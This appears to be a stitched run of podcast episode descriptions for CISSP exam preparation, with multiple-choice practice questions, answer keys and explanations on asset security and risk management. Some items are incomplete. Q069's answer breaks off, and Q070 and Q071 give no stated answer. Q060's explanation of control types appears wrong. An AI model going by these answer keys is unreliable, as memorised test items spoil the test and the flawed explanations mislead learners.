from a database. However, data classification can be used to dictate who has access to read and write data that is stored in a database. Each classification should have separate handling requirements and procedures pertaining to how that data is accessed, used, and destroyed. For example, in a corporation, confidential information may only be accessed by senior management. Auditing could be very detailed and its results monitored daily, and degaussing or overwriting procedures may be required to erase the data. On the other hand, information classified as public may be accessed by all employees, with no special auditing or destruction methods required. From ------------------------------------ Question:  077 Susan, an attorney, has been hired to fill a new position at Widgets, Inc.: chief privacy officer (CPO). What is the primary function of her new role? Ensuring the protection of partner data Ensuring the accuracy and protection of company financial information Ensuring that security policies are defined and enforced Ensuring the protection of customer, company, and employee data Answer: [Ensuring the protection of customer, company, and employee data] The chief privacy officer (CPO) position is being created by companies in response to the increasing demands on organizations to protect myriad types of data. The CPO is responsible for ensuring the security of customer, company, and employee data, which keeps the company free from legal prosecution and—hopefully—out of the headlines. Thus, the CPO is directly involved with setting policies on how data is collected, protected, and distributed to third parties. The CPO is usually an attorney and reports to the chief security officer (CSO). From ------------------------------------ Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will talk about questions for Domain 2 (Asset Security) of the CISSP Exam. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ CISSP Exam Questions Question:  072 Jared plays a role in his company’s data classification system. In this role, he must practice due care when accessing data and ensure that the data is used only in accordance with allowed policy while abiding by the rules set for the classification of the data. He does not determine, maintain, or evaluate controls, so what is Jared’s role? Data owner Data custodian Data user Information systems auditor Answer: C. Any individual who uses data for work-related tasks is a data user. Users must have the necessary level of access to the data to perform the duties within their position and are responsible for following operational security procedures to ensure the data’s confidentiality, integrity, and availability to others. This means that users must practice due care and act in accordance with both security policy and data classification rules. From

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will talk about the following items that are included within Domain 2 (Asset Security) of the CISSP Exam. CISSP Article – Best Practices for Data Management CISSP Training –  Determine and maintain information and asset ownership CISSP Exam Questions BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/  CISSP Exam Questions Question:  069 You work as an IT professional for a defense contractor that handles classified military information. Which one of the following data classifications applies to information that could be expected to cause serious damage to national security if disclosed in an unauthorized fashion?  SBU Top Secret Secret Confidential - Given Top Secret classification is "applied to information, the unauthorized disclosure of which reasonably could be expected to cause exceptionally grave damage to the national security." Confidential classification is "applied to information, the unauthorized disclosure of which reasonably could be expected to cause damage to the national security." Sensitive But Unclassified (SBU) information is protected information that does not reach the threshold for classified information From ------------------------------------ Question:  070 You are using symmetric encryption to protect data stored on a hard drive that will be shipped across the country. What key(s) are involved in the protection of this information?  Shared secret Public key  Public and private keys Private key Public keys are used to encrypt information intended for a specific recipient in asymmetric cryptography. They are not used in symmetric cryptography. Private keys are used to decrypt information in asymmetric cryptography. They are not used in symmetric cryptography. Public and private keypairs are used in asymmetric cryptography. They are not used in symmetric cryptography. From ------------------------------------ Question:  071 Which one of the following is NOT a European Union data handling principle required for participation in the Safe Harbor program?  Onward Transfer Choice  Encryption Notice The Notice principle states that organizations must inform individuals about the purpose and scope of data collection efforts. The Choice principle states that organizations must offer individuals the ability to opt out of information collection and storage programs. The Onward Transfer principle states that organizations must only share information with other organizations that comply with the data privacy directive From ------------------------------------ Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources Online Article https://www.simplilearn.com/asset-security-tutorial-video CISSP Exam Questions https://www.techveze.com/cissp-asset-security/

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will talk about questions for Domain 1 (Security and Risk Management) of the CISSP Exam. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ CISSP Exam Questions Question:  066 Which of the following would generally not be considered an asset in a risk analysis? A) A development process B) An IT infrastructure C) A proprietary system resource D) Users' personal files Answer: [D] Users' personal files - The personal files of users are not usually considered assets of the organization and thus are not considered in a risk analysis. From ------------------------------------ Question:  067 You've performed a basic quantitative risk analysis on a specific threat/vulnerability/risk relation. You select a possible countermeasure. When performing the calculations again, which of the following factors will change? A) Exposure factor B) Single loss expectancy C) Asset value D) Annualized rate of occurrence Answer: [d] Annualized rate of occurrence - A countermeasure directly affects the annualized rate of occurrence, primarily because the countermeasure is designed to prevent the occurrence of the risk, thus reducing its frequency per year. From ------------------------------------ Question:  068 What ensures that the subject of an activity or event cannot deny that the event occurred? A) CIA Triad B) Abstraction C) Nonrepudiation D) Hash totals Answer: [c] Nonrepudiation - Nonrepudiation ensures that the subject of an activity or event cannot deny that the event occurred. From  ------------------------------------ Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources  

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will talk about questions for Domain 1 (Security and Risk Management) of the CISSP Exam. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ CISSP Exam Questions Question:  063 When seeking to hire new employees, what is the first step? A) Create a job description. B) Set position classification. C) Screen candidates. D) Request resumes. Answer: A. Create a job description. The first step in hiring new employees is to create a job description. Without a job description, there is no consensus on what type of individual needs to be found and hired. Source: From ------------------------------------ Question:  064 Which of the following describes the freedom from being observed, monitored, or examined without consent or knowledge? A) Integrity B) Privacy C) Authentication D) Accountability Answer: [b] Privacy - One definition of privacy is freedom from being observed, monitored, or examined without consent or knowledge. Source:  From ------------------------------------ Question:  065 Which of the following is typically not a characteristic considered when classifying data? A) Value B) Size of object C) Useful lifetime D) National security implications Answer: [b] Size of object - Size is not a criterion for establishing data classification. When classifying an object, you should take value, lifetime, and security implications into consideration. From ------------------------------------ Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources

Description: Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will talk about the following items that are included within Domain 1 (Security and Risk Management) of the CISSP Exam. CISSP Article – Threat Modeling CISSP Training – Data Integrity and Threat Modeling CISSP Exam Questions BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/  CISSP Exam Questions Question:  060 You are a security consultant. A large enterprise customer hires you to ensure that their security operations are following industry standard control frameworks. For this project, the customer wants you to focus on technology solutions that will discourage malicious activities. Which type of control framework should you focus on? A.  Preventative B.  Deterrent C.  Detective D.  Corrective E.  Assessment Answer: [B] Explanation: Deterrent frameworks are technology-related and used to discourage malicious activities. For example, an intrusion prevention system or a firewall would be appropriate in this framework. There are three other primary control frameworks. A preventative framework helps establish security policies and security awareness training. A detective framework is focused on finding unauthorized activity in your environment after a security incident. A corrective framework focuses on activities to get your environment back after a security incident. There isn’t an assessment framework.   Source:  From ------------------------------------ Question:  061 You are performing a risk analysis for an internet service provider (ISP) that has thousands of customers on its broadband network. Over the past 5 years, some customers have been compromised or experienced data breaches. The ISP has a large amount of monitoring and log data for all customers. You need to figure out the chances of additional customers experiencing a security incident based on that data. Which type of approach should you use for the risk analysis? A. Qualitative B. Quantitative C. STRIDE D. Reduction E. Market Answer: [B] Explanation: You have three risk analysis methods to choose from: qualitative (which uses a risk analysis matrix), quantitative (which uses money or metrics to compute), or hybrid (a combination of qualitative and quantitative but not an answer choice in this scenario). Because the ISP has monitoring and log data, you should use a quantitative approach; it will help quantify the chances of additional customers experiencing a security risk. STRIDE is used for threat modeling. A market approach is used for asset valuation. A reduction analysis attempts to eliminate duplicate analysis and is tied to threat modeling. Source:  From ----------------------------------- Question:  062 You are working on a business continuity project for a company that generates a large amount of content each day for use in social networks. Your team establishes 4 hours as the maximum tolerable data loss in a disaster recovery or business continuity event. In which part of the business continuity plan should you document this? A.  Recovery time objective (RTO) B.  Recovery point objective (RPO) C.  Maximum tolerable downtime (MTD) D.  Maximum data tolerance (MDT) Answer: [B] Explanation: The RTO establishes the maximum amount of time the organization will be down (or how long it takes to recover), the RPO establishes the maximum data loss that is tolerable, the MTD covers the maximum tolerable downtime, and MDT is just a made-up phrase used as a distraction. In this scenario, with the focus on the data loss, the correct answer is RPO.   Source:  From   Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources Online Article https://www.varonis.com/blog/threat-modeling/> CISSP Exam Questions https://blog.netwrix.com/2018/05/16/cissp-practice-exam-free-online-test-questions/>

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will talk about questions for Domain 8 (Software Development Security) of the CISSP Exam. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ Want to find Shon Gerber elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources TechTarget https://searchsecurity.techtarget.com/quiz/CISSP-Domain-8-quiz-Law-Investigations-and-Ethics?q0=1&q1=0&q2=2&q3=1&q4=1&q5=1&q6=2&q7=0&q8=2&q9=0&q10=1&q11=3&q12=0&q13=3&q14=2&x=69&y=11

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will talk about questions for Domain 8 (Software Development Security) of the CISSP Exam. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ Want to find Shon Gerber elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources TechTarget https://searchsecurity.techtarget.com/quiz/CISSP-Domain-8-quiz-Law-Investigations-and-Ethics?q0=1&q1=0&q2=2&q3=1&q4=1&q5=1&q6=2&q7=0&q8=2&q9=0&q10=1&q11=3&q12=0&q13=3&q14=2&x=69&y=11

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.    In this episode, Shon will talk about questions for Domain 8 (Software Development Security) of the CISSP Exam.   BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ Want to find Shon Gerber elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/   LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources TechTarget https://searchsecurity.techtarget.com/quiz/CISSP-Domain-8-quiz-Law-Investigations-and-Ethics?q0=1&q1=0&q2=2&q3=1&q4=1&q5=1&q6=2&q7=0&q8=2&q9=0&q10=1&q11=3&q12=0&q13=3&q14=2&x=69&y=11  

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will talk about the following items that are included within Domain 8 (Software Development Security) of the CISSP Exam. CISSP Articles – RAYGUN - SDLC:  7 phases, popular models, benefits, and more CISSP Training –  Integrate Security in the Software Development Life Cycle (SDLC) CISSP Exam Questions BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ Want to find Shon Gerber elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources Raygun https://raygun.com/blog/software-development-life-cycle/ TechTarget https://searchsecurity.techtarget.com/quiz/CISSP-Domain-5-quiz-Types-of-access-control-systems?q0=1&q1=2&q2=2&q3=3&q4=2&q5=2&q6=2&q7=2&q8=2&q9=2&x=70&y=11 Vendors: LastPass.com https://www.lastpass.com/

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will talk about questions for Domain 6 (Security Assessment and Testing) of the CISSP Exam: BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ Want to find Shon Gerber elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources TechTarget https://searchsecurity.techtarget.com/quiz/Get-ready-for-CISSP-Domain-7-Cyberattack-prevention-quiz?q0=0&x=84&y=9>

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will talk about questions for Domain 6 (Security Assessment and Testing) of the CISSP Exam:   BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ Want to find Shon Gerber elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources TechTarget https://searchsecurity.techtarget.com/quiz/Get-ready-for-CISSP-Domain-7-Cyberattack-prevention-quiz?q0=0&x=84&y=9

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will talk about the following items that are included within Domain 7 (Security Operations) of the CISSP Exam. CISSP Articles – Supporting Investigations CISSP Training –  Understanding and Supporting Investigations CISSP Exam Questions   BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ Want to find Shon Gerber elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources https://www.isc2.org/Training/Self-Study-Resources Infosec Institute https://resources.infosecinstitute.com/category/certifications-training/cissp/domains/identity-and-access-management/access-control-categories/#gref TechTarget https://searchsecurity.techtarget.com/quiz/CISSP-Domain-7-quiz-Business-Continuity?q0=1&q1=2&q4=0&q6=1&q7=0&q9=1&q13=3&x=95&y=8 Vendors: LastPass.com https://www.lastpass.com/

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will talk about questions for Domain 6 (Security Assessment and Testing) of the CISSP Exam: BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ Want to find Shon Gerber elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources TechTarget https://searchsecurity.techtarget.com/quiz/CISSP-Domain-5-quiz-Types-of-access-control-systems?q0=0&x=77&y=10

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will talk about questions for Domain 6 (Security Assessment and Testing) of the CISSP Exam: BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ Want to find Shon Gerber elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources TechTarget https://searchsecurity.techtarget.com/quiz/CISSP-Domain-5-quiz-Types-of-access-control-systems?q0=0&x=77&y=10

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will talk about the following items that are included within Domain 6 (Security Assessment and Testing) of the CISSP Exam. CISSP Articles – Security Assessment and Testing CISSP Training – Security Assessment and Testing CISSP Exam Questions BTW - Get access to all my CISSP Training Courses here at: https://shongerber.com/ Want to find Shon Gerber elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources Infosec Institute https://resources.infosecinstitute.com/cissp-domain-6-refresh-security-assessment-and-testing/#gref TechTarget https://searchsecurity.techtarget.com/quiz/CISSP-Domain-6-quiz-Vulnerabilities-in-software?q0=1&q1=1&x=78&y=3 Vendors: LastPass.com https://www.lastpass.com/

Description: Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will talk about questions for Domain 5 (Identity and Access Management) of the CISSP Exam: BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ Want to find Shon Gerber elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources TechTarget https://searchsecurity.techtarget.com/quiz/CISSP-Domain-5-quiz-Types-of-access-control-systems?q0=0&x=77&y=10

Description: Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will talk about questions for Domain 5 (Identity and Access Management) of the CISSP Exam. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ Want to find Shon Gerber elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources TechTarget https://searchsecurity.techtarget.com/quiz/CISSP-Domain-5-quiz-Types-of-access-control-systems?q0=0&x=77&y=10